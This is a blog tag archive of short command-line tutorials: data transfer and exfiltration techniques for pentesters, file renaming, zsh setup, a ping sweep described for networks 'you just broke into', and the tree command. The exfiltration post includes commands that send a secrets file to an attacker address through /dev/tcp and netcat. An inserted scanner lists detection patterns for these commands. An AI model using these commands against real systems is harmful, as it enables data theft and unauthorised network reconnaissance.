Tag Archive for cli

Data exfiltration from the CLI

If you do pentesting or any kind of security analysis, you have probably found yourself needing to transfer data between your machine and the vulnerable machine. It is useful to know a few ways to do this in case one of them doesn't work in your specific situation.

- Generic
Samba can be configured on the attacker machine so that you can connect from the vulnerable machine using the "net use" (Windows) or "mount -t cifs" (Linux) commands and then transfer files.

example:
net use z: \\192.168.1.20\<share> /u:attacker

smb.conf http://www.samba.org/samba/docs/using_samba/ch06.html

FTP is another way to do this, but remember that both the data and the login credentials travel in plain text. Also, since the client is interactive, if you only have a non-interactive shell you will need to script it.

example for the windows ftp client:
open ftp.domain.com
username
password
get file.txt
bye

run with ftp -s:script-name.txt

example for the linux ftp client:
http://www.stratigery.com/scripting.ftp.html

TFTP is a simpler version of FTP: it uses UDP and it doesn't support authentication. A popular TFTP server is Tftpd32. It is still in use for things like backing up a router configuration or uploading the latest firmware.

SSH will allow us to transfer data in a safe manner; we can use the scp command to transfer files over ssh.

Netcat is also an option. It is usually available in most Linux distributions and there is also a Windows version. If you need encryption, try cryptcat or socat.

example:
echo data | nc 192.168.1.20 80

- Linux specific
On Linux you can use /dev/tcp/<host>/<port> to open a TCP connection to another host. This is a Bash feature rather than a real device file, and you need a recent version of Bash for it to work. We can then use netcat to capture the data on the other end.

example:
cat secret_data.txt > /dev/tcp/192.168.1.20/500

- Windows specific
In Windows we can use PowerShell to open TCP connections or to download files over HTTP.

example:

As you can see, there are many ways to transfer files, so pick the one that suits you best and enjoy!
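Every method above leaves a recognisable command line behind. As an added example (not from the original post), here is a small defender-side scanner that reads shell command lines from an audit feed, such as bash history or flattened auditd EXECVE records, and tags the transfer methods listed above for review. The log lines are constructed for the demo.

```shell
# Added example (not from the original post): tag the transfer methods
# described above when they show up in a shell command log.
# Output is "TAG<TAB>command", one line per flagged command.
flag_transfer_cmds() {
    while IFS= read -r line; do
        case "$line" in
            *'/dev/tcp/'*|*'/dev/udp/'*)
                printf 'bash-net-redirect\t%s\n' "$line" ;;
            *'ftp -s:'*)
                printf 'scripted-ftp\t%s\n' "$line" ;;
            nc\ *|ncat\ *|*' nc '*|*' ncat '*|*'|nc '*|*'|ncat '*)
                printf 'netcat\t%s\n' "$line" ;;
            *'net use '*|*'mount -t cifs'*)
                printf 'smb-mount\t%s\n' "$line" ;;
            tftp\ *|*' tftp '*)
                printf 'tftp\t%s\n' "$line" ;;
        esac
    done
}

# Constructed sample command log (not real data); two of the seven
# lines are ordinary admin activity and must not be flagged.
sample_log() {
    cat <<'EOF'
ls -la /var/www
echo data | nc 192.168.1.20 80
cat notes.txt > /dev/tcp/192.168.1.20/500
ftp -s:script-name.txt
net use z: \\192.168.1.20\share /u:attacker
tar czf backup.tgz /etc
tftp 192.168.1.20 -c put config.bin
EOF
}

# Quick summary: how many lines of the sample log were flagged.
count_flagged() {
    sample_log | flag_transfer_cmds | wc -l | tr -d ' '
}
```

Run `sample_log | flag_transfer_cmds` to see the tagged lines; feed a real history or audit export on stdin instead of the sample to use it for real.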

Mass renaming

Say you have a bunch of files that you want to rename. There are two easy approaches to this problem: you can use the aptly named 'rename' utility, which should be available on most Linux distributions, or you can use a FOR loop. Let's see both.

Our job this time is to rename these images to have a lowercase extension.

We can achieve this with this command:

Problem solved. As you can see, the syntax is similar to sed: basically we are saying "substitute .JPG with .jpg for all files in this directory".

Now using a for loop we are going to convert these extensions back to uppercase, just for practice.

There is also a slight variation:
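The loop form is worth writing carefully, because a plain `mv` will silently overwrite a file that already has the lowercase name. As an added example (not the post's own command), this function does the same job as the rename line above, copes with spaces in file names and refuses to clobber an existing target; the file names in the demo are constructed.

```shell
# Added example, not from the original post.
# Usage: lowercase_ext DIR EXT   (EXT is the uppercase extension, e.g. JPG)
# Renames DIR/*.EXT to DIR/*.ext, skips any file whose lowercase name
# already exists, and prints how many files were renamed.
lowercase_ext() {
    local dir=$1 ext=$2 lower f target renamed=0
    lower=$(printf '%s' "$ext" | tr 'A-Z' 'a-z')
    for f in "$dir"/*."$ext"; do
        [ -e "$f" ] || continue           # no match: the glob stays literal
        target="${f%.*}.$lower"           # strip the old extension, add new
        if [ -e "$target" ]; then
            printf 'skip: %s already exists\n' "$target" >&2
            continue
        fi
        mv -- "$f" "$target"
        renamed=$((renamed + 1))
    done
    echo "$renamed"
}

# Demo on a scratch directory with constructed names, including a
# collision (dup.JPG next to dup.jpg) that must be left alone.
# Prints the rename count followed by the resulting directory listing.
demo_lowercase() {
    local tmp n
    tmp=$(mktemp -d)
    : > "$tmp/photo one.JPG"
    : > "$tmp/photo two.JPG"
    : > "$tmp/dup.JPG"
    : > "$tmp/dup.jpg"
    n=$(lowercase_ext "$tmp" JPG)
    echo "$n"
    ls "$tmp" | LC_ALL=C sort
    rm -rf "$tmp"
}
```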

Beyond Bash

If you use Linux you are probably using the bash shell, but turns out there is life beyond bash!

When using aptitude or apt-get I’m sure you tried this at least once:

aptitude ins;
"Oops, that didn't work but I wish it did!"

Well, that and much more is possible using another shell: ZSH. To get started you will want to install it (it should be available in your distro's repo). After that just run 'zsh'; you may get a dialog asking if you would like to create a basic configuration file (.zshrc, just like .bashrc). Just skip it, but don't get scared when your prompt looks like this:

\[\e]0;\u@\h: \w\a\]${debian_chroot:+($debian_chroot)}\u@\h:\w\$

This is happening because it's trying to use your bash prompt, which uses a different syntax. Now we are going to install "oh-my-zsh", which contains a decent default config and various plugins, and it will set zsh as your default shell (you can revert using chsh -s /bin/bash user). It also comes with themes, which are nothing more than prompt configurations; you can see images of how they look here:

https://github.com/robbyrussell/oh-my-zsh/wiki/themes

To install oh-my-zsh issue this command:

curl -L https://github.com/robbyrussell/oh-my-zsh/raw/master/tools/install.sh | sh

Now we are ready to start playing with our new shell, let’s explore some of the features.

- Better Tab completion

Zsh is able to autocomplete the arguments for most system commands, and even gives us a menu-like interface if you press Tab twice.

This also works with the kill command:

- Typo correction

Zsh will help you to fix those annoying typos you make all the time:

- Auto pushd

If you jump a lot between different dirs you are going to love this: zsh can automatically push the dirs you cd into onto the directory stack. This means you can list the recent dirs you have been in using the 'd' command (which is an alias for dirs -v) and then change to one of them by just typing the corresponding number.

And that’s just a small taste of what zsh has to offer, now it’s your turn to try it and decide if you like it.

Zsh FAQ: http://zsh.sourceforge.net/FAQ/
Zsh documentation: http://zsh.sourceforge.net/Doc/

CLI ninja: Ping Sweep

Ever wanted to do a ping sweep on a new network you just broke into, but you don't want (or can't, for some reason, AVs etc.) to upload any tools?

Well, you can still do it by leveraging the OS built-in tools. With a for loop we can ping a whole class C in about 3 min on Windows and in about 10 sec on Linux. Let's start with Linux:

for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done

What this does is a for loop from 1 to 254; $i takes the value of the current iteration, so in the first one it will be 1, then 2, 3 and so on. Then we call the ping command with the -c option, which means ping only once (otherwise it would ping forever). After that we pipe the output to grep so we only see the hosts that actually responded, and the & at the end sends it to the background so all the pings are launched in parallel. If we only want the IP address and not the whole line, we can further filter this using cut.

Now for windows…

for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i >nul && echo 192.168.1.%i is up.

As you can see the idea is the same: -n is the equivalent of -c in Linux's ping and -w is the timeout (in milliseconds). Then we send the output to nul and echo only if the ping command was successful (that's what the && is for).
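The Linux loop above works, but the shell returns before the background pings finish and you still get whole lines. As an added example (not the post's own code), here it is wrapped in a function that adds the cut filter the text mentions and a per-host timeout, with the output parsing split out so it can be checked against constructed ping output; it assumes iputils ping (the -W flag) and is meant for inventorying a subnet you administer.

```shell
# Added example, not from the original post.
# extract_live_ips: keep only "bytes from" lines, take field 4
# (e.g. "64 bytes from 192.168.1.5: icmp_seq=1"), drop the trailing
# colon, and print each responding address once, in numeric order.
extract_live_ips() {
    grep 'bytes from' | cut -d' ' -f4 | tr -d ':' |
        sort -u -t. -k1,1n -k2,2n -k3,3n -k4,4n
}

# sweep_subnet PREFIX: ping PREFIX.1 .. PREFIX.254 once each, in parallel.
# The pipe only closes when the last background ping exits, so the
# function does not return until every reply (or timeout) is in.
# -W 1 is the iputils ping reply timeout in seconds (assumption: Linux).
sweep_subnet() {
    prefix=$1
    for i in $(seq 1 254); do
        ping -c 1 -W 1 "$prefix.$i" 2>/dev/null &
    done | extract_live_ips
}

# Constructed ping output (not real captures) for checking the parser
# offline: two hosts answered, one of them twice, one did not answer.
sample_ping_output() {
    cat <<'EOF'
PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=0.412 ms
64 bytes from 192.168.1.2: icmp_seq=1 ttl=64 time=1.03 ms
64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=0.398 ms
--- 192.168.1.5 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms
EOF
}
```

`sweep_subnet 192.168.1` prints just the live addresses; `sample_ping_output | extract_live_ips` shows the filter alone.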

The tree command

With the tree command in Linux you can get a tree representation of a directory structure. Without any arguments it will start at the current dir and recursively go into each subdir to show the complete hierarchy.


# tree
.
├── 1
│   ├── 44
│   ├── aa
│   ├── bb
│   └── ff
└── 2
    ├── cc
    └── dd

3 directories, 5 files

This is just some dirs and files I made for testing, but if you run this on a real dir you will get a lot of output. To solve this you can use the -L option to limit the depth:


# tree -L 1
.
├── 1
└── 2

Well, that's a bit better. You can also get other useful information, like permissions, using the -p option:

# tree -p
.
├── [drw-r-----] 1
│   ├── [drwxr-xr-x] 44
│   ├── [-rw-r--r--] aa
│   ├── [-rw-r--r--] bb
│   └── [-rw-r--r--] ff
└── [drwxr-xr-x] 2
    ├── [-rw-r--r--] cc
    └── [-rw-r--r--] dd

Another useful one is -u, to show the owners of the files:

# tree -u
.
├── [root ] 1
│   ├── [root ] 44
│   ├── [matu ] aa
│   ├── [matu ] bb
│   └── [matu ] ff
└── [root ] 2
    ├── [root ] cc
    └── [root ] dd

Others that can also come in handy are -d to show only dirs and -s to show the size of files, but I will leave these to try on your own.